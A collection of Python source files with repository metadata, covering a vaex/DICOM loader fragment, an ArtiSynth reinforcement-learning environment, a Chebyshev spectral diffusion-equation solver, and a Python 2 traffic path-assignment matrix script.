raise Exception("No vaex files found in directory: {0}".format(source))
elif len(arrays) == 1:
label = list(arrays.keys())[0]
return [Data(array=arrays[label], label=label)]
# We now check whether all the shapes of the vaex files are the same,
# and if so, we merge them into a single file.
labels = sorted(arrays)
ref_shape = arrays[labels[0]].shape
for label in labels[1:]:
if arrays[label].shape != ref_shape:
break
else:
# Since we are here, the shapes of all the vaex files match, so
# we can construct a higher-dimensional array.
# Make sure arrays are sorted while constructing array
array = np.array([arrays[label] for label in labels])
# We flip the array here on that in most cases we expect that the
# scan will start at the top of e.g. the body and move downwards.
array = array[::-1]
return [Data(array=array, label=dicom_label(source))]
# If we are here, the shapes of the vaex files didn't match, so we
# simply return one Data object per vaex file.
return [Data(array=arrays[label], label=label) for label in labels]
else:
ds = vaex.open(source)
data = [DataVaex(ds)]
return data
| 2.40625
| 2
|
src/python/artisynth_envs/envs/point2point_env.py
|
amir-abdi/artisynth-rl
| 4
|
12783548
|
<filename>src/python/artisynth_envs/envs/point2point_env.py
import numpy as np
from common import constants as c
from common.config import setup_logger
from artisynth_envs.artisynth_base_env import ArtiSynthBase
logger = setup_logger()
class Point2PointEnv(ArtiSynthBase):
def __init__(self, goal_threshold, wait_action, reset_step, goal_reward, **kwargs):
super().__init__(**kwargs)
self.goal_threshold = goal_threshold
self.prev_distance = None
self.wait_action = wait_action
self.episode_counter = 0
self.reset_step = int(reset_step)
self.goal_reward = goal_reward
self.position_radius = self.get_radius(kwargs['artisynth_args'])
self.init_spaces()
@staticmethod
def get_radius(args_str):
return float(args_str.split('radius ')[1])
def get_state_boundaries(self, action_size):
low = []
high = []
if self.include_current_state:
for i in range(3):
low.append(-self.position_radius)
high.append(self.position_radius)
for i in range(3):
low.append(-self.position_radius)
high.append(self.position_radius)
low = np.array(low)
high = np.array(high)
if self.include_current_excitations:
low = np.append(low, np.full((action_size,), 0))
high = np.append(high, np.full((action_size,), 1))
return low, high
def reset(self):
self.prev_distance = None
logger.info('Reset')
return super().reset()
def configure(self, *args, **kwargs):
pass
def step(self, action):
logger.debug('action:{}'.format(action))
self.episode_counter += 1
self.take_action(action)
self.sleep(self.wait_action)
state = self.get_state_dict()
if not state:
return None, 0, False, {}
obs = state[c.OBSERVATION_STR]
distance = self.distance_to_target(obs)
reward, done, info = self.calculate_reward(distance, self.prev_distance)
self.prev_distance = distance
state_arr = self.state_dic_to_array(state)
if self.episode_counter >= self.reset_step:
done = True
return state_arr, reward, done, info
def calculate_reward(self, new_dist, prev_dist):
if not prev_dist:
return 0, False, {}
done = False
info = {'distance': new_dist}
if new_dist < self.goal_threshold:
done = True
reward = 5
logger.log(msg='Achieved done state', level=18)
else:
if prev_dist - new_dist > 0:
reward = 1 / self.episode_counter
else:
reward = -1
logger.log(msg='Reward: ' + str(reward), level=18)
return reward, done, info
| 2.328125
| 2
|
pyapprox/benchmarks/spectral_diffusion.py
|
ConnectedSystems/pyapprox
| 26
|
12783549
|
import numpy as np
import inspect
from scipy.linalg import qr as qr_factorization
from copy import deepcopy
from pyapprox.utilities import cartesian_product, outer_product
from pyapprox.univariate_polynomials.quadrature import gauss_jacobi_pts_wts_1D
from pyapprox.barycentric_interpolation import (
compute_barycentric_weights_1d,
multivariate_barycentric_lagrange_interpolation
)
from pyapprox.models.wrappers import (
evaluate_1darray_function_on_2d_array
)
from pyapprox.utilities import qr_solve
def kronecker_product_2d(matrix1, matrix2):
"""
TODO: I can store kroneker as a sparse matrix see ( scipy.kron )
"""
assert matrix1.shape == matrix2.shape
assert matrix1.ndim == 2
block_num_rows = matrix1.shape[0]
matrix_num_rows = block_num_rows**2
matrix = np.empty((matrix_num_rows, matrix_num_rows), float)
# loop through blocks
start_col = 0
for jj in range(block_num_rows):
start_row = 0
for ii in range(block_num_rows):
matrix[start_row:start_row+block_num_rows,
start_col:start_col+block_num_rows] = \
matrix2*matrix1[ii, jj]
start_row += block_num_rows
start_col += block_num_rows
return matrix
def chebyshev_derivative_matrix(order):
if order == 0:
pts = np.array([1], float)
derivative_matrix = np.array([0], float)
else:
# this is reverse order used by matlab cheb function
pts = -np.cos(np.linspace(0., np.pi, order+1))
scalars = np.ones((order+1), float)
scalars[0] = 2.
scalars[order] = 2.
scalars[1:order+1:2] *= -1
derivative_matrix = np.empty((order+1, order+1), float)
for ii in range(order+1):
row_sum = 0.
for jj in range(order+1):
if (ii == jj):
denominator = 1.
else:
denominator = pts[ii]-pts[jj]
numerator = scalars[ii] / scalars[jj]
derivative_matrix[ii, jj] = numerator / denominator
row_sum += derivative_matrix[ii, jj]
derivative_matrix[ii, ii] -= row_sum
# I return points and calculate derivatives using reverse order of points
# compared to what is used by Matlab cheb function thus the
# derivative matrix I return will be the negative of the matlab version
return pts, derivative_matrix
class SteadyStateDiffusionEquation1D(object):
"""
solve (a(x)*u_x)_x = f; x in [0,1]; subject to u(0)=a; u(1)=b
"""
def __init__(self):
self.diffusivity = None
self.forcing_function = None
self.bndry_cond = [0., 0.]
self.xlim = [0, 1]
self.adjoint_derivative_matrix = None
self.adjoint_mesh_pts = None
self.num_time_steps = 0
self.time_step_size = None
self.initial_sol = None
self.num_stored_timesteps = 1
self.time_step_method = 'crank-nicholson'
# default qoi functional is integral of solution over entire domain
self.qoi_functional = self.integrate
self.qoi_functional_deriv = lambda x: x*0.+1.
def scale_canonical_pts(self, pts):
return (self.xlim[1]-self.xlim[0])*(pts+1.)/2.+self.xlim[0]
def initialize(self, order, bndry_cond=None, xlim=None):
self.order = order
if xlim is not None:
self.xlim = xlim
if bndry_cond is not None:
self.bndry_cond = bndry_cond
mesh_pts, self.derivative_matrix = chebyshev_derivative_matrix(order)
# scale mesh points to from [-1,1] to [a,b]
self.mesh_pts_1d = self.scale_canonical_pts(mesh_pts)
self.mesh_pts = self.mesh_pts_1d
# scale derivative matrix from [-1,1] to [a,b]
self.derivative_matrix *= 2./(self.xlim[1]-self.xlim[0])
def set_diffusivity(self, func):
assert callable(func)
assert len(inspect.getargspec(func)[0]) == 2
self.diffusivity = func
def set_forcing(self, func):
assert callable(func)
assert len(inspect.getargspec(func)[0]) == 2
self.forcing_function = func
def form_collocation_matrix(self, derivative_matrix, diagonal):
scaled_matrix = np.empty(derivative_matrix.shape)
for i in range(scaled_matrix.shape[0]):
scaled_matrix[i, :] = derivative_matrix[i, :] * diagonal[i]
matrix = np.dot(derivative_matrix, scaled_matrix)
return matrix
def apply_boundary_conditions_to_matrix(self, matrix):
matrix[0, :] = 0
matrix[-1, :] = 0
matrix[0, 0] = 1
matrix[-1, -1] = 1
return matrix
def apply_boundary_conditions_to_rhs(self, rhs):
rhs[0] = self.bndry_cond[0]
rhs[-1] = self.bndry_cond[1]
return rhs
def apply_boundary_conditions(self, matrix, forcing):
assert len(self.bndry_cond) == 2
matrix = self.apply_boundary_conditions_to_matrix(matrix)
forcing = self.apply_boundary_conditions_to_rhs(forcing)
return matrix, forcing
def explicit_runge_kutta(self, rhs, sol, time, time_step_size):
assert callable(rhs)
dt2 = time_step_size/2.
k1 = rhs(time, sol)
k2 = rhs(time+dt2, sol+dt2*k1)
k3 = rhs(time+dt2, sol+dt2*k2)
k4 = rhs(time+time_step_size, sol+time_step_size*k3)
new_sol = sol+time_step_size/6.*(k1+2.*k2+2.*k3+k4)
new_sol[0] = self.bndry_cond[0]
new_sol[-1] = self.bndry_cond[1]
return new_sol
def form_adams_moulton_3rd_order_system(self, matrix, current_sol,
current_forcing, future_forcing,
prev_forcing, prev_sol,
time_step_size):
""" 3rd order Adams-Moultobn method
WARNING: seems to be unstable (at least my implementation)
y_{n+2} = y_{n+1}+h(c_0y_{n+2}+c_1y_{n+1}+c_3y_{n})
c = (5/12,2/3,-1./12)
"""
dt12 = time_step_size/12.
dt12matrix = dt12*matrix
identity = np.eye(matrix.shape[0])
matrix = identity-5.*dt12matrix
forcing = np.dot(identity+8.*dt12matrix, current_sol)
forcing += dt12*(5.*future_forcing+8.*current_forcing-prev_forcing)
forcing -= np.dot(dt12matrix, prev_sol)
# currently I do not support time varying boundary conditions
return self.apply_boundary_conditions(matrix, forcing)
def get_implicit_time_step_rhs(self, current_sol, time, sample):
future_forcing = self.forcing_function(
self.mesh_pts, time+self.time_step_size, sample)
if (self.time_step_method == "backward-euler"):
forcing = current_sol + self.time_step_size*future_forcing
elif (self.time_step_method == "crank-nicholson"):
identity = np.eye(self.collocation_matrix.shape[0])
forcing = np.dot(
identity+0.5*self.time_step_size*self.collocation_matrix, current_sol)
current_forcing = self.forcing_function(
self.mesh_pts, time, sample)
forcing += 0.5*self.time_step_size*(current_forcing+future_forcing)
else:
raise Exception('incorrect timestepping method specified')
# apply boundary conditions
forcing[0] = self.bndry_cond[0]
forcing[-1] = self.bndry_cond[1]
return forcing
def get_implicit_timestep_matrix_inverse_factors(self, matrix):
identity = np.eye(matrix.shape[0])
if (self.time_step_method == "backward-euler"):
matrix = identity-self.time_step_size*matrix
elif (self.time_step_method == "crank-nicholson"):
matrix = identity-self.time_step_size/2.*matrix
else:
raise Exception('incorrect timestepping method specified')
self.apply_boundary_conditions_to_matrix(matrix)
return qr_factorization(matrix)
def time_step(self, current_sol, time, sample):
if self.time_step_method == 'RK4':
def rhs_func(t, u): return np.dot(
self.collocation_matrix, u) +\
self.forcing_function(self.mesh_pts, t, sample)
current_sol = self.explicit_runge_kutta(
rhs_func, current_sol, time, self.time_step_size)
else:
rhs = self.get_implicit_time_step_rhs(current_sol, time, sample)
current_sol = qr_solve(
self.implicit_matrix_factors[0], self.implicit_matrix_factors[1],
rhs[:, None])[:, 0]
#current_sol = np.linalg.solve( matrix, rhs )
return current_sol
def transient_solve(self, sample):
# in future consider supporting time varying diffusivity. This would
# require updating collocation matrix at each time-step
# for now make diffusivity time-independent
# assert self.diffusivity_function.__code__.co_argcount == 3
diffusivity = self.diffusivity_function(self.mesh_pts, sample)
self.collocation_matrix = self.form_collocation_matrix(
self.derivative_matrix, diffusivity)
# consider replacing time = 0 with time = self.initial_time
time = 0.
assert self.forcing_function.__code__.co_argcount == 3
current_forcing = self.forcing_function(self.mesh_pts, time, sample)
if self.num_time_steps > 0:
assert self.initial_sol is not None
assert self.time_step_size is not None
current_sol = self.initial_sol.copy()
assert self.num_stored_timesteps <= self.num_time_steps
# num_time_steps is number of steps taken after initial time
self.times = np.empty((self.num_stored_timesteps), float)
sols = np.empty((self.initial_sol.shape[0],
self.num_stored_timesteps), float)
sol_cntr = 0
sol_storage_stride = self.num_time_steps/self.num_stored_timesteps
if self.time_step_method != 'RK4':
self.implicit_matrix_factors = \
self.get_implicit_timestep_matrix_inverse_factors(
self.collocation_matrix)
for i in range(1, self.num_time_steps+1):
# Construct linear system
current_sol = self.time_step(current_sol, time, sample)
time += self.time_step_size
# Store history if requested
if i % sol_storage_stride == 0:
sols[:, sol_cntr] = current_sol
self.times[sol_cntr] = time
sol_cntr += 1
assert sol_cntr == self.num_stored_timesteps
return sols
else:
current_forcing = self.forcing_function(
self.mesh_pts, time, sample)
matrix, rhs = self.apply_boundary_conditions(
self.collocation_matrix.copy(), current_forcing)
return np.linalg.solve(matrix, rhs)
def solve(self, diffusivity, forcing):
assert diffusivity.ndim == 1
assert forcing.ndim == 1
# forcing will be overwritten with bounary values so must take a
# deep copy
forcing = forcing.copy()
# we need another copy so that forcing can be used when solving adjoint
self.forcing_vals = forcing.copy()
assert not np.any(diffusivity <= 0.)
self.collocation_matrix = self.form_collocation_matrix(
self.derivative_matrix, diffusivity)
matrix, forcing = self.apply_boundary_conditions(
self.collocation_matrix.copy(), forcing)
solution = np.linalg.solve(matrix, forcing)
# store solution for use with adjoints
self.fwd_solution = solution.copy()
return solution
def run(self, sample):
assert sample.ndim == 1
diffusivity = self.diffusivity_function(self.mesh_pts, sample)
forcing = self.forcing_function(self.mesh_pts, sample)
solution = self.solve(diffusivity, forcing)
return solution
def solve_adjoint(self, sample, order):
"""
Typically with FEM we solve Ax=b and the discrete adjoint equation
is A'y=z. But with collocation this does not work. Instead of
taking the adjoint of the discrete system as the aforemntioned
approach does. We discretize continuous adjoint equation. Which for
the ellipic diffusion equation is just Ay=z. That is the adjoint
of A is A.
"""
if order == self.order:
# used when computing gradient from adjoint solution
matrix = self.collocation_matrix.copy()
else:
# used when computing error estimate from adjoint solution
if self.adjoint_derivative_matrix is None:
adjoint_mesh_pts, self.adjoint_derivative_matrix = \
chebyshev_derivative_matrix(order)
self.adjoint_mesh_pts = self.scale_canonical_pts(
adjoint_mesh_pts)
# scale derivative matrix from [-1,1] to [a,b]
self.adjoint_derivative_matrix *= 2. / \
(self.xlim[1]-self.xlim[0])
diffusivity = self.diffusivity_function(
self.adjoint_mesh_pts, sample)
matrix = self.form_collocation_matrix(
self.adjoint_derivative_matrix, diffusivity)
self.adjoint_collocation_matrix = matrix.copy()
# regardless of whether computing error estimate or
# computing gradient, rhs is always derivative (with respect to the
# solution) of the qoi_functional
qoi_deriv = self.qoi_functional_deriv(self.fwd_solution)
matrix = self.apply_boundary_conditions_to_matrix(matrix)
qoi_deriv = self.apply_adjoint_boundary_conditions_to_rhs(qoi_deriv)
adj_solution = np.linalg.solve(matrix, qoi_deriv)
return adj_solution
def apply_adjoint_boundary_conditions_to_rhs(self, qoi_deriv):
# adjoint always has zero Dirichlet BC
qoi_deriv[0] = 0
qoi_deriv[-1] = 0
return qoi_deriv
def compute_residual(self, matrix, solution, forcing):
matrix, forcing = self.apply_boundary_conditions(matrix, forcing)
return forcing - np.dot(matrix, solution)
def compute_residual_derivative(self, solution, diagonal,
forcing_deriv):
matrix = self.form_collocation_matrix(self.derivative_matrix,
diagonal)
# Todo: check if boundary conditions need to be applied to both
# matrix and forcing_derivs or just matrix. If the former
# what boundary conditions to I impose on the focing deriv
matrix = self.apply_boundary_conditions_to_matrix(
matrix)
# the values here are the derivative of the boundary conditions
# with respect to the random parameters. I assume that
# this is always zero
forcing_deriv[0] = 0
forcing_deriv[-1] = 0
return forcing_deriv.squeeze() - np.dot(matrix, solution)
def compute_error_estimate(self, sample):
raise NotImplementedError("Not passing tests")
# must solve adjoint with a higher order grid
adj_solution = self.solve_adjoint(sample, self.order*2)
# interpolate forward solution onto higher-order grid
interp_fwd_solution = self.interpolate(
self.fwd_solution, self.adjoint_mesh_pts)
# compute residual of forward solution using higher-order grid
forcing_vals = self.forcing_function(self.adjoint_mesh_pts,
sample)
# compute residual
residual = self.compute_residual(self.adjoint_collocation_matrix,
interp_fwd_solution, forcing_vals)
# self.plot(interp_fwd_solution+adj_solution,
# plot_mesh_coords=self.adjoint_mesh_pts )
# self.plot(residual, plot_mesh_coords=self.adjoint_mesh_pts,
# color='r')
# pylab.show()
# print self.integrate((adj_solution+interp_fwd_solution )**2)
# print(np.dot(residual, adj_solution )/self.integrate(
# residual * adj_solution)
print('cond', np.linalg.cond(self.adjoint_collocation_matrix))
error_estimate = self.integrate(residual * adj_solution, self.order*2)
return error_estimate
def evaluate_gradient(self, sample):
assert sample.ndim == 1
num_stoch_dims = sample.shape[0]
# qoi_deriv = self.qoi_functional_deriv(self.mesh_pts)
adj_solution = self.solve_adjoint(sample, self.order)
gradient = np.empty((num_stoch_dims), float)
for i in range(num_stoch_dims):
diffusivity_deriv_vals_i = self.diffusivity_derivs_function(
self.mesh_pts.squeeze(), sample, i)
forcing_deriv_vals_i = self.forcing_derivs_function(
self.mesh_pts.squeeze(), sample, i)
residual_deriv = self.compute_residual_derivative(
self.fwd_solution, diffusivity_deriv_vals_i,
forcing_deriv_vals_i)
gradient[i] = self.integrate(residual_deriv * adj_solution)
return gradient
def value(self, sample):
assert sample.ndim == 1
solution = self.run(sample)
qoi = self.qoi_functional(solution)
if np.isscalar(qoi) or qoi.ndim == 0:
qoi = np.array([qoi])
return qoi
def integrate(self, mesh_values, order=None):
if order is None:
order = self.order
# Get Gauss-Legendre rule
gl_pts, gl_wts = gauss_jacobi_pts_wts_1D(order, 0, 0)
# Scale points from [-1,1] to to physical domain
x_range = self.xlim[1]-self.xlim[0]
gl_pts = x_range*(gl_pts+1.)/2.+self.xlim[0]
# Remove factor of 0.5 from weights
gl_wts *= x_range
# Interpolate mesh values onto quadrature nodes
gl_vals = self.interpolate(mesh_values, gl_pts)
# Compute and return integral
return np.dot(gl_vals[:, 0], gl_wts)
def interpolate(self, mesh_values, eval_samples):
if eval_samples.ndim == 1:
eval_samples = eval_samples[None, :]
if mesh_values.ndim == 1:
mesh_values = mesh_values[:, None]
assert mesh_values.ndim == 2
num_dims = eval_samples.shape[0]
abscissa_1d = [self.mesh_pts_1d]*num_dims
weights_1d = [compute_barycentric_weights_1d(xx) for xx in abscissa_1d]
interp_vals = multivariate_barycentric_lagrange_interpolation(
eval_samples,
abscissa_1d,
weights_1d,
mesh_values,
np.arange(num_dims))
return interp_vals
def plot(self, mesh_values, num_plot_pts_1d=None, plot_mesh_coords=None,
color='k'):
import pylab
if num_plot_pts_1d is not None:
# interpolate values onto plot points
plot_mesh = np.linspace(
self.xlim[0], self.xlim[1], num_plot_pts_1d)
interp_vals = self.interpolate(mesh_values, plot_mesh)
pylab.plot(plot_mesh, interp_vals, color+'-')
elif plot_mesh_coords is not None:
assert mesh_values.shape[0] == plot_mesh_coords.squeeze().shape[0]
pylab.plot(plot_mesh_coords, mesh_values, 'o-'+color)
else:
# just plot values on mesh points
pylab.plot(self.mesh_pts, mesh_values, color)
def get_collocation_points(self):
return np.atleast_2d(self.mesh_pts)
def get_derivative_matrix(self):
return self.derivative_matrix
def __call__(self, samples):
return evaluate_1darray_function_on_2d_array(
self.value, samples, None)
class SteadyStateDiffusionEquation2D(SteadyStateDiffusionEquation1D):
"""
solve (a(x)*u_x)_x = f; x in [0,1]x[0,1];
subject to u(0,:)=a(x); u(:,0)=b(x), u(1,:)=c(x), u(:,1)=d(x)
"""
def __init__(self):
self.diffusivity = None
self.forcing_function = None
self.bndry_cond = [0., 0., 0., 0.]
self.xlim = [0, 1]
self.ylim = [0, 1]
self.left_bc, self.right_bc = None, None
self.top_bc, self.bottom_bc = None, None
# default qoi functional is integral of solution over entire domain
self.qoi_functional = self.integrate
self.qoi_functional_deriv = lambda x: x*0.+1.
def determine_boundary_indices(self):
# boundary edges are stored with the following order,
# left, right, bottom, top
self.boundary_edges = [[], [], [], []]
self.boundary_indices = np.empty((4*self.order), int)
# To avoid double counting the bottom and upper boundaries
# will not include the edge indices
cntr = 0
for i in range(self.mesh_pts.shape[1]):
if (self.mesh_pts[0, i] == self.xlim[0]):
self.boundary_indices[cntr] = i
self.boundary_edges[0].append(cntr)
cntr += 1
elif (self.mesh_pts[0, i] == self.xlim[1]):
self.boundary_indices[cntr] = i
self.boundary_edges[1].append(cntr)
cntr += 1
elif (self.mesh_pts[1, i] == self.ylim[0]):
self.boundary_indices[cntr] = i
self.boundary_edges[2].append(cntr)
cntr += 1
elif (self.mesh_pts[1, i] == self.ylim[1]):
self.boundary_indices[cntr] = i
self.boundary_edges[3].append(cntr)
cntr += 1
def initialize(self, order, bndry_cond=None, lims=None):
# 1d model transforms mesh pts 1d from are on [-1,1] to [a,b]
# I will asssume that second physical dimension is also [a,b]
super(SteadyStateDiffusionEquation2D, self).initialize(order,
bndry_cond[:2],
lims[:2])
self.ylim = lims[2:]
self.bndry_cond = bndry_cond
self.order = order
self.mesh_pts_1d = self.mesh_pts
self.mesh_pts = cartesian_product([self.mesh_pts_1d]*2, 1)
# note scaling of self.derivative_matrix to [a,b] happens at base class
self.determine_boundary_indices()
# form derivative (in x1-direction) matrix of a 2d polynomial
# this assumes that 2d-mesh_pts varies in x1 faster than x2,
# e.g. points are
# [[x11,x21],[x12,x21],[x13,x12],[x11,x22],[x12,x22],...]
Ident = np.eye(self.order+1)
derivative_matrix_1d = self.get_derivative_matrix()
self.derivative_matrix_1 = np.kron(Ident, derivative_matrix_1d)
# form derivative (in x2-direction) matrix of a 2d polynomial
self.derivative_matrix_2 = np.kron(derivative_matrix_1d, Ident)
def form_collocation_matrix(self, derivative_matrix, diagonal):
scaled_matrix_1 = np.empty(self.derivative_matrix_1.shape)
scaled_matrix_2 = np.empty(self.derivative_matrix_2.shape)
for i in range(scaled_matrix_1.shape[0]):
scaled_matrix_1[i, :] = self.derivative_matrix_1[i, :]*diagonal[i]
scaled_matrix_2[i, :] = self.derivative_matrix_2[i, :]*diagonal[i]
matrix_1 = np.dot(self.derivative_matrix_1, scaled_matrix_1)
matrix_2 = np.dot(self.derivative_matrix_2, scaled_matrix_2)
return matrix_1 + matrix_2
def apply_boundary_conditions_to_matrix(self, matrix):
# apply default homogeenous zero value direchlet conditions if
# necessary
if self.left_bc is None:
self.left_bc = lambda x: 0.
if self.right_bc is None:
self.right_bc = lambda x: 0.
if self.bottom_bc is None:
self.bottom_bc = lambda x: 0.
if self.top_bc is None:
self.top_bc = lambda x: 0.
# adjust collocation matrix
matrix[self.boundary_indices, :] = 0.
for i in range(self.boundary_indices.shape[0]):
index = self.boundary_indices[i]
matrix[index, index] = 1.
return matrix
def apply_boundary_conditions_to_rhs(self, forcing):
# apply left boundary condition
indices = self.boundary_indices[self.boundary_edges[0]]
forcing[indices] = self.left_bc(self.mesh_pts[0, indices])
# apply right boundary condition
indices = self.boundary_indices[self.boundary_edges[1]]
forcing[indices] = self.right_bc(self.mesh_pts[0, indices])
# apply bottom boundary condition
indices = self.boundary_indices[self.boundary_edges[2]]
forcing[indices] = self.bottom_bc(self.mesh_pts[1, indices])
# apply top boundary condition
indices = self.boundary_indices[self.boundary_edges[3]]
forcing[indices] = self.top_bc(self.mesh_pts[1, indices])
return forcing
def plot(self, mesh_values, num_plot_pts_1d=100):
if num_plot_pts_1d is not None:
# interpolate values onto plot points
def func(x): return self.interpolate(mesh_values, x)
from utilities.visualisation import plot_surface_from_function
plot_surface_from_function(func, [self.xlim[0], self.xlim[1],
self.ylim[0], self.ylim[1]],
num_plot_pts_1d, False)
def apply_adjoint_boundary_conditions_to_rhs(self, qoi_deriv):
# adjoint always has zero Dirichlet BC
# apply left boundary condition
for ii in range(4):
indices = self.boundary_indices[self.boundary_edges[ii]]
qoi_deriv[indices] = 0
return qoi_deriv
def integrate(self, mesh_values, order=None):
if order is None:
order = self.order
# Get Gauss-Legendre rule
gl_pts, gl_wts = gauss_jacobi_pts_wts_1D(order, 0, 0)
pts_1d, wts_1d = [], []
lims = self.xlim+self.ylim
for ii in range(2):
# Scale points from [-1,1] to to physical domain
x_range = lims[2*ii+1]-lims[2*ii]
# Remove factor of 0.5 from weights and shift to [a,b]
wts_1d.append(gl_wts*x_range)
pts_1d.append(x_range*(gl_pts+1.)/2.+lims[2*ii])
# Interpolate mesh values onto quadrature nodes
pts = cartesian_product(pts_1d)
wts = outer_product(wts_1d)
gl_vals = self.interpolate(mesh_values, pts)
# Compute and return integral
return np.dot(gl_vals[:, 0], wts)
| 2.1875
| 2
|
base.py
|
Lemma1/DPFE
| 16
|
12783550
|
import numpy as np
import pandas as pd
import datetime
import os
import matplotlib.pyplot as plt
import matplotlib
import networkx as nx
import pickle
from collections import OrderedDict
import copy
from scipy.sparse import csr_matrix
from scipy import io
import seaborn as sns
import joblib
class Link:
def __init__(self, ID, length, fft):
self.ID = ID
self.length = length
self.fft = fft
class Path:
def __init__(self):
self.node_list = None
self.link_list = None
self.cost = None
self.p = None
return
def node_to_list(self, G, link_dict):
if self.node_list == None:
print "Nothing to convert"
return
tmp = list()
for i in xrange(len(self.node_list) - 1):
try:
link_ID = G[self.node_list[i]][self.node_list[i+1]]["ID"]
if link_ID not in link_dict.keys():
tmp_link = Link(link_ID, G[self.node_list[i]][self.node_list[i+1]]["length"],
G[self.node_list[i]][self.node_list[i+1]]["fft"])
tmp.append(tmp_link)
link_dict[link_ID] = tmp_link
else:
tmp.append(link_dict[link_ID])
except:
print "ERROR"
print self.node_list[i], self.node_list[i+1]
self.link_list = tmp
def overlap(min1, max1, min2, max2):
return max(0, min(max1, max2) - max(min1, min2))
def get_finish_time(spd, length_togo, start_time, tmp_date):
basis = datetime.datetime.combine(tmp_date, datetime.time(0,0,0))
time_seq = map(lambda x: (datetime.datetime.combine(tmp_date, x) - basis).total_seconds(), spd.index)
data = np.array(spd.tolist()).astype(np.float)
# print data
# print time_seq
cur_spd = np.interp((datetime.datetime.combine(tmp_date, start_time) - basis).total_seconds(), time_seq, data) / 1600.0 * 3600.0
try:
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = length_togo/cur_spd)).time()
# print "need:", length_togo/cur_spd
except:
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = 10)).time()
return new_start_time
########################
## deprecated
########################
# def get_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict, spd=None):
# if len(link_list) == 0:
# return start_time
# link_to_pass = link_list[0]
# if link_to_pass.length == np.float(0):
# link_list.pop(0)
# return get_arrival_time(start_time, link_list, spd_data, tmp_date, link_dict)
# if link_to_pass.ID not in spd_data.keys():
# link_list.pop(0)
# new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = np.round(link_to_pass.fft))).time()
# return get_arrival_time(new_start_time, link_list, spd_data, tmp_date, link_dict)
# if type(spd) == type(None):
# spd = spd_data[link_to_pass.ID].loc[tmp_date]
# length_togo = link_to_pass.length
# new_start_time = get_finish_time(spd, length_togo, start_time, tmp_date)
# link_list.pop(0)
# return get_arrival_time(new_start_time, link_list, spd_data, tmp_date, link_dict, spd)
# def get_ratio(path, link, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict):
# start_time = (datetime.datetime.combine(tmp_date, analysis_start_time) + h * time_interval).time()
# start_time2 = (datetime.datetime.combine(tmp_date, analysis_start_time) + (h+1) * time_interval).time()
# tmp_link_list = list()
# for tmp_link in path.link_list:
# if link != tmp_link:
# tmp_link_list.append(tmp_link)
# else:
# break
# # print tmp_link_list
# arrival_time = get_arrival_time(start_time, copy.copy(tmp_link_list), spd_data, tmp_date, link_dict)
# arrival_time2 = get_arrival_time(start_time2, copy.copy(tmp_link_list), spd_data, tmp_date, link_dict)
# p_v = get_pv(arrival_time, arrival_time2, start_time, time_interval, tmp_date)
# if (len(p_v) > 2):
# print start_time, arrival_time, arrival_time2
# print p_v
# return p_v
# row_list = list()
# col_list = list()
# data_list = list()
# for k, path in enumerate(path_list):
# print k, len(path.link_list)
# for a, link in enumerate(link_list):
# if (delta[a, k] == 1):
# for h in xrange(N):
# p_v = get_ratio(path, link, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict)
# for idx, p in enumerate(p_v):
# if (h + idx < N):
# x_loc = a + num_link * (h + idx)
# y_loc = k + num_path * h
# row_list.append(x_loc)
# col_list.append(y_loc)
# data_list.append(p)
def get_pv(arrival_time, arrival_time2, analysis_start_time, time_interval, tmp_date):
basis = datetime.datetime.combine(tmp_date, datetime.time(0,0,0))
arrival_time_date = datetime.datetime.combine(tmp_date, arrival_time)
arrival_time_date2 = datetime.datetime.combine(tmp_date, arrival_time2)
total = np.float((arrival_time_date2 -arrival_time_date).total_seconds())
cur_time_date = datetime.datetime.combine(tmp_date, analysis_start_time)
pv = list()
while(cur_time_date < arrival_time_date2):
cur_time_date2 = cur_time_date + time_interval
overlap_zone = overlap((cur_time_date - basis).total_seconds(), (cur_time_date2 - basis).total_seconds(), (arrival_time_date - basis).total_seconds(), (arrival_time_date2 - basis).total_seconds())
# print np.float(overlap_zone) / total
pv.append(np.float(overlap_zone) / total)
cur_time_date = cur_time_date2
return pv
def get_arrival_time(start_time, link, spd_data, tmp_date, link_dict):
link_to_pass = link
if link_to_pass.length == np.float(0):
return start_time
if link_to_pass.ID not in spd_data.keys():
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = link_to_pass.fft)).time()
return new_start_time
try:
spd = spd_data[link_to_pass.ID].loc[tmp_date]
except:
print "Except, not spd data"
new_start_time = (datetime.datetime.combine(tmp_date, start_time) + datetime.timedelta(seconds = link_to_pass.fft)).time()
return new_start_time
length_togo = link_to_pass.length
new_start_time = get_finish_time(spd, length_togo, start_time, tmp_date)
return new_start_time
def get_ratio(path, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict):
pv_dict = dict()
start_time = (datetime.datetime.combine(tmp_date, analysis_start_time) + h * time_interval).time()
start_time2 = (datetime.datetime.combine(tmp_date, analysis_start_time) + (h+1) * time_interval).time()
arrival_time = copy.copy(start_time)
arrival_time2 = copy.copy(start_time2)
for link in path.link_list:
arrival_time = get_arrival_time(arrival_time, link, spd_data, tmp_date, link_dict)
arrival_time2 = get_arrival_time(arrival_time2, link, spd_data, tmp_date, link_dict)
p_v = get_pv(arrival_time, arrival_time2, start_time, time_interval, tmp_date)
pv_dict[link] = p_v
return pv_dict
def get_assign_matrix(N, spd_data, analysis_start_time, time_interval, tmp_date, link_dict, link_list, link_loc, path_list):
num_link = len(link_list)
num_path = len(path_list)
row_list = list()
col_list = list()
data_list = list()
for k, path in enumerate(path_list):
# if k % 1 == 0:
# print k, len(path_list), len(path.link_list)
for h in xrange(N):
pv_dict = get_ratio(path, h, spd_data, analysis_start_time, time_interval, tmp_date, link_dict)
# print pv_dict
for link, p_v in pv_dict.iteritems():
a = link_loc[link]
for idx, p in enumerate(p_v):
if (h + idx < N):
y_loc = a + num_link * (h + idx)
x_loc = k + num_path * h
row_list.append(y_loc)
col_list.append(x_loc)
data_list.append(p)
# print row_list, col_list
r = csr_matrix((data_list, (row_list, col_list)), shape=(num_link * N, num_path * N))
return r
def save_r(N, spd_data, analysis_start_time, time_interval, single_date, link_dict, link_list, link_loc, path_list):
import joblib
date_str = single_date.strftime("%Y-%m-%d")
print date_str
r = get_assign_matrix(N, spd_data, analysis_start_time, time_interval, single_date, link_dict, link_list, link_loc, path_list)
